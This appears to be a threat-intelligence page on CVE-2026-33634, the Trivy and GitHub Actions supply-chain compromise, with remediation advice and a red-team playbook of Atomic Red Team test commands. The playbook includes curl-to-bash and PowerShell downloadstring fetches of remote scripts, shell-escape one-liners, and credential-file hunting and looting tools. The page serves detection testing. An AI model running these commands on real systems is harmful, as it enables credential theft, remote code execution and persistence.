CVE-2026-33634

HIGH CISA KEV POC TTE Zero-Day Pub 23/03 Upd 30/03

Overview

This vulnerability is a supply chain compromise involving credential theft and unauthorized code injection. The root cause is improper credential management and non-atomic credential rotation, which allowed an attacker to use valid tokens to push malicious commits and replace version tags in GitHub repositories. The affected components include the aquasecurity Trivy binary (version 0.69.4), the trivy-action GitHub Action (versions 0.0.1 to 0.34.2), and the setup-trivy GitHub Action (versions 0.2.0 to 0.2.6).

Vulnerability Description

Trivy is a security scanner. On March 19, 2026, a threat actor used compromised credentials to publish a malicious Trivy v0.69.4 release, force-push 76 of 77 version tags in `aquasecurity/trivy-action` to credential-stealing malware, and replace all 7 tags in `aquasecurity/setup-trivy` with malicious commits. This incident is a continuation of the supply chain attack that began in late February 2026. Following the initial disclosure on March 1, credential rotation was performed but was not atomic (not all credentials were revoked simultaneously). The attacker could have use a valid token to exfiltrate newly rotated secrets during the rotation window (which lasted a few days). This could have allowed the attacker to retain access and execute the March 19 attack. Affected components include the `aquasecurity/trivy` Go / Container image version 0.69.4, the `aquasecurity/trivy-action` GitHub Action versions 0.0.1 – 0.34.2 (76/77), and the`aquasecurity/setup-trivy` GitHub Action versions 0.2.0 – 0.2.6, prior to the recreation of 0.2.6 with a safe commit. Known safe versions include versions 0.69.2 and 0.69.3 of the Trivy binary, version 0.35.0 of trivy-action, and version 0.2.6 of setup-trivy. Additionally, take other mitigations to ensure the safety of secrets. If there is any possibility that a compromised version ran in one's environment, all secrets accessible to affected pipelines must be treated as exposed and rotated immediately. Check whether one's organization pulled or executed Trivy v0.69.4 from any source. Remove any affected artifacts immediately. Review all workflows using `aquasecurity/trivy-action` or `aquasecurity/setup-trivy`. Those who referenced a version tag rather than a full commit SHA should check workflow run logs from March 19–20, 2026 for signs of compromise. Look for repositories named `tpcp-docs` in one's GitHub organization. The presence of such a repository may indicate that the fallback exfiltration mechanism was triggered and secrets were successfully stolen. Pin GitHub Actions to full, immutable commit SHA hashes, don't use mutable version tags.

Impact

An attacker with compromised credentials and valid tokens was able to inject malicious code into widely used GitHub Actions and container images, enabling credential theft and potential secret exfiltration. This attack requires prior access to repository credentials and the ability to push tags and commits. The attacker could access and steal secrets from affected CI/CD pipelines, leading to data breaches and lateral movement within organizations. The CVSS vector indicates network attack with low complexity, no user interaction, and high impact on confidentiality, integrity, and availability.

Solution

Users must immediately verify whether Trivy v0.69.4 or affected trivy-action and setup-trivy versions were pulled or executed. Remove all affected artifacts and rotate all secrets accessible to impacted pipelines. Upgrade to known safe versions: Trivy binary 0.69.2 or 0.69.3, trivy-action 0.35.0, and setup-trivy 0.2.6 with safe commits. Pin GitHub Actions to immutable full commit SHA hashes instead of mutable version tags. Refer to the official advisory at https://github.com/aquasecurity/trivy/security/advisories/GHSA-69fq-xp46-6x23 for detailed patch instructions and mitigation steps.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The recent incident involving the Trivy security scanner highlights a significant vulnerability within the software supply chain, particularly concerning the management of credentials and the integrity of version control systems. On March 19, 2026, a threat actor exploited compromised credentials to publish a malicious release of Trivy version 0.69.4. This release was not an isolated event but rather a continuation of a broader supply chain attack that had begun in late February 2026. The attacker managed to force-push 76 of 77 version tags in the `aquasecurity/trivy-action` repository to include credential-stealing malware, while also replacing all tags in the `aquasecurity/setup-trivy` repository with malicious commits. The vulnerability underscores the critical need for robust credential management and the importance of ensuring that version control practices are secure and resilient against unauthorized access.

The exploitation of this vulnerability can occur through various attack vectors. The initial compromise stemmed from a failure to perform atomic credential rotation, which left a window of opportunity for the attacker to exfiltrate newly rotated secrets. During this period, the attacker could utilize a valid token to access sensitive information, thereby facilitating the malicious release of Trivy v0.69.4. Organizations that had pulled or executed this compromised version may have inadvertently introduced malware into their environments, leading to potential data breaches and unauthorized access to sensitive systems. Furthermore, the presence of repositories named `tpcp-docs` within an organization’s GitHub account could indicate that the fallback exfiltration mechanism was triggered, revealing that secrets had been successfully stolen.

The real-world impact of this vulnerability is profound, particularly for organizations relying on the affected components for their CI/CD pipelines. The business risks associated with deploying compromised software are substantial, including data loss, reputational damage, and regulatory penalties. Organizations may face increased scrutiny from stakeholders and customers, particularly if sensitive data is exposed as a result of the attack. Additionally, the financial implications of remediation efforts, such as incident response, forensic analysis, and potential legal liabilities, can be significant. The incident serves as a stark reminder of the vulnerabilities inherent in software supply chains and the critical need for organizations to adopt a proactive approach to security.

To effectively detect and mitigate the risks associated with this vulnerability, organizations must implement a multi-faceted strategy. Immediate actions should include a thorough review of all workflows utilizing the affected GitHub Actions, ensuring that any references to version tags are replaced with immutable commit SHA hashes to prevent future exploitation. Organizations should also conduct an audit of their systems to determine whether the compromised version of Trivy was executed, and if so, treat all secrets accessible to affected pipelines as exposed and rotate them immediately. Monitoring for unusual activity in repositories, particularly those named `tpcp-docs`, can provide early indicators of compromise. Additionally, organizations should enhance their credential management practices by adopting atomic credential rotation and implementing stricter access controls to minimize the risk of unauthorized access.

In conclusion, the vulnerability associated with the malicious release of Trivy v0.69.4 serves as a critical case study in the importance of securing software supply chains. By understanding the technical details of the incident, recognizing the potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against similar threats in the future. The incident emphasizes the need for continuous vigilance and a proactive security posture in an increasingly complex digital landscape.




CSURFACE threat intelligence has identified a notable shift in the exploitation dynamics surrounding CVE-2026-33634. While our telemetry indicates a significant reduction in detection activity, the overall exploit landscape has concurrently expanded with the emergence of new proof-of-concept tools designed to leverage this supply chain compromise. This divergence suggests that threat actors are refining their operational tactics, potentially favoring stealthier or more targeted approaches rather than broad, noisy exploitation campaigns. The increase in the Exploit Prediction Scoring System (EPSS) by over 25% underscores a heightened likelihood of exploitation attempts despite the apparent drop in detection volume. For defenders, this evolving pattern signals a complex threat environment where traditional detection metrics may underrepresent actual adversary engagement. Consequently, the risk level remains elevated, as adversaries possess more sophisticated capabilities to exploit compromised Trivy releases, increasing the potential for widespread credential theft and downstream supply chain contamination.



Update 2 — July 05, 2026

CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2026-33634, with telemetry indicating a doubling in detection events linked to malicious modifications of the Trivy setup-trivy repository. This surge reflects renewed adversary efforts to leverage compromised credentials for supply chain manipulation, suggesting that threat actors are intensifying attempts to propagate credential-stealing malware through CI/CD pipelines. The persistence and amplification of these tactics underscore the adversaries’ capability to maintain footholds despite prior credential rotations and remediation efforts. Notably, the stable EPSS score at a high percentile indicates sustained exploitation potential without immediate rapid growth, implying a steady-state threat environment with ongoing risk rather than a transient spike. For defenders, this development signals that the threat remains active and evolving, requiring continued vigilance and monitoring of Trivy-related components within software supply chains. The overall risk level remains elevated due to the increased likelihood of successful compromise and the broad impact potential across multiple environments reliant on the affected software.

Affected Products (7)

Vendor Product Version CPE
aquasec Aquasec Setup-Trivy All cpe:2.3:a:aquasec:setup-trivy:*:*:*:*:*:*:*:*
aquasec Aquasec Trivy 0.69.4 cpe:2.3:a:aquasec:trivy:0.69.4:*:*:*:*:go:*:*
aquasec Aquasec Trivy Action All cpe:2.3:a:aquasec:trivy_action:*:*:*:*:*:*:*:*
litellm Litellm Litellm 1.82.7 cpe:2.3:a:litellm:litellm:1.82.7:*:*:*:*:*:*:*
litellm Litellm Litellm 1.82.8 cpe:2.3:a:litellm:litellm:1.82.8:*:*:*:*:*:*:*
telnyx Telnyx Telnyx 4.87.1 cpe:2.3:a:telnyx:telnyx:4.87.1:*:*:*:*:python:*:*
telnyx Telnyx Telnyx 4.87.2 cpe:2.3:a:telnyx:telnyx:4.87.2:*:*:*:*:python:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

GitHub PoCs (4)

Repository Author Stars Forks Date Link
PoC
- 0 0 - View
ugurrates/teampcp-supply-chain-attack
CVE-2026-33634 (CVSS 9.4) — The most impactful CI/CD supply chain attack of 2026 so far.
ugurrates 0 0 2026-03-25 View
fevar54/CVE-2026-33634-Scanner
**Scanner automatizado para la detección de indicadores de compromiso (IOCs) asociados al ataque a la cadena de suminist...
fevar54 0 0 2026-03-30 View
AshleyT3/docker-socket-risk-demos
Companion source for YouTube video "Stop Mounting docker.sock — Run Trivy Without Giving Away Root Access — (inspired by...
AshleyT3 0 0 2026-03-31 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

18 events
2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-29
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-03-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-27
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-03-26
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-03-26
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2026-03-25
PoC Published (4 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2026-03-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Information Disclosure
76% info_disclosure
hardcoded_credentials
61% hardcoded_credentials
Authentication Bypass
59% auth_bypass

MITRE ATT&CK Techniques (7)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1195.001 Compromise Software Dependencies and Development Tools Initial Access initial-access Linux, macOS, Windows
T1195.002 Compromise Software Supply Chain Initial Access initial-access Linux, Windows, macOS
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-442 Infected Software
38%
Medium High
CAPEC-448 Embed Virus into DLL
35%
Medium High
CAPEC-636 Hiding Malicious Data or Code within Files
35%
High

Red Team Playbook

45 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1195.002 Simulate npm package installation on a Linux system containers, Linux Bash
Launches a short‑lived Kubernetes pod using the Node 18 image, initializes a minimal npm project in /tmp/test, and installs the specified npm package without audit/fund/package‑lock options, simulating potentially suspicious package retrieval (e.g., typosquatting/dependency...
Command (Bash)
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (15)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2026-33634
github.com
GitHub CVE x_refsource_CONFIRM
https://github.com/aquasecurity/trivy/security/advisories/GHSA-69fq-xp46-6x23
github.com
GitHub CVE x_refsource_MISC
https://github.com/team-telnyx/telnyx-python/security/advisories/GHSA-955r-262c-33jc
github.com
GitHub CVE x_refsource_MISC
https://github.com/BerriAI/litellm/issues/24518
docs.litellm.ai
GitHub CVE x_refsource_MISC
https://docs.litellm.ai/blog/security-update-march-2026
futuresearch.ai
GitHub CVE x_refsource_MISC
https://futuresearch.ai/blog/litellm-pypi-supply-chain-attack
github.com
GitHub CVE x_refsource_MISC
https://github.com/aquasecurity/trivy/discussions/10425
github.com
GitHub CVE x_refsource_MISC
https://github.com/pypa/advisory-database/tree/main/vulns/litellm/PYSEC-2026-2.yaml
inspector.pypi.io
GitHub CVE x_refsource_MISC
https://inspector.pypi.io/project/litellm/1.82.7/packages/79/5f/b6998d42c6ccd32d36e12661f2734602e72a576d52a51f4245aef0b20b4d/litellm-1.82.7-py3-none-any.whl/litellm/proxy/proxy_server.py#line.130
inspector.pypi.io
GitHub CVE x_refsource_MISC
https://inspector.pypi.io/project/litellm/1.82.8/packages/f6/2c/731b614e6cee0bca1e010a36fd381fba69ee836fe3cb6753ba23ef2b9601/litellm-1.82.8.tar.gz/litellm-1.82.8/litellm_init.pth#line.1
wiz.io
GitHub CVE x_refsource_MISC
https://www.wiz.io/blog/teampcp-attack-kics-github-action
github.com
NVD API Issue Tracking Mitigation Third Party Advisory
https://github.com/BerriAI/litellm/issues/24518#issuecomment-4127436387
rosesecurity.dev
NVD API Exploit Third Party Advisory
https://rosesecurity.dev/2026/03/20/typosquatting-trivy.html
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33634
microsoft.com
NVD API Technical Description
https://www.microsoft.com/en-us/security/blog/2026/03/24/detecting-investigating-defending-against-trivy-supply-chain-compromise/